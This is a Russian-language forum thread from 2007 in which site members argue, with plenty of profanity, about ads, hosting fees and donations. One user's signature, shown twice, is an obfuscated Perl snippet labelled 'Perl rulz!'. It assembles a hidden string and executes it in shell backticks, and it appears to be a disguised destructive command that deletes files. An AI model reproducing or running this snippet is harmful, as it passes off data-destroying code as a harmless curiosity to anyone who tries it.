на самом деле опера блочит текст, если правильно задать параметры блокировки) _________________ Love is not about the profits,
Nor the riches in your dreams....
ALuserX
Сделайте смайлик "лопата",а то мне уже шутить сложно. _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
--------------------
--########--
--########--
-------###-------
-------###-------
-------###-------
-------###-------
--########--
---#######---
----######----
-----#####-----
--------------------
вот тебе саперная лопатка _________________ Love is not about the profits,
Nor the riches in your dreams....
Добавлено: Вт Ноя 06, 2007 8:55 am Заголовок сообщения:
Maynard
дам на хостинг когда приеду, тока отруби эту лажу нахуй
ваще это у нас один из плюсов на сайте (был?) - отсуствие рекламы
можно было понтоватсо какие мы сука бедные и нихуя не имеем
а тебе от 34 цента конечно да душе тепло стало, бля, дис, я не знал что ты такой жадный _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
Добавлено: Вт Ноя 06, 2007 9:06 am Заголовок сообщения:
ALuserX
Если не жадный - следующие три месяца оплачиваешь ты.
Сумма действительно небольшая - всего 750 рублей. _________________ Fortuna non penis in manus non recipe
Добавлено: Вт Ноя 06, 2007 9:30 am Заголовок сообщения:
Попробуй, кстати это не тот случай, где можно говорить о жадности.
А вообще... можешь считать меня жадным.
Я все равно знаю, что в данном случае ты не прав.
Если смотреть со стороны отдлачи - получения - я что-то отдаю, но при этом ничего не получаю.
Ты ничего не отдаешь и ничего не получаешь. Я бы тоже так хотел.
Смотрим дальше. О жадности.
Ты (конкретно ты, ALuserX) что-то отдаешь (хуячишь дискографию, выкладываешь аудио/видео)
А кто-то взял и запостил это у себя на сайте. Тебе это не нравится. Ты злишься, возмущаешься, банишь переходы с того сайта и т.д.
Потому что ты что-то отдаешь, но ничего не получаешь.
Даже ссылки на автора.
Вот и делай вывод. _________________ Fortuna non penis in manus non recipe
Кстати, не далее, как сегодня, в поддержку сайта был получен 1 WMR от некого пользователя Homer, который незамедлительно был переведен на Основной счет хостинга.
За что вышеуказанному пользователя большое спасибо. _________________ Fortuna non penis in manus non recipe
да я не возмущаюсь, дис, меня просто левое говно на сайте бесит, посмотри на гениуса хотя бы
если бы ты раньше сказал что тебе надо помогать с оплатой хостинга я бы не отказался ты же знаешь _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!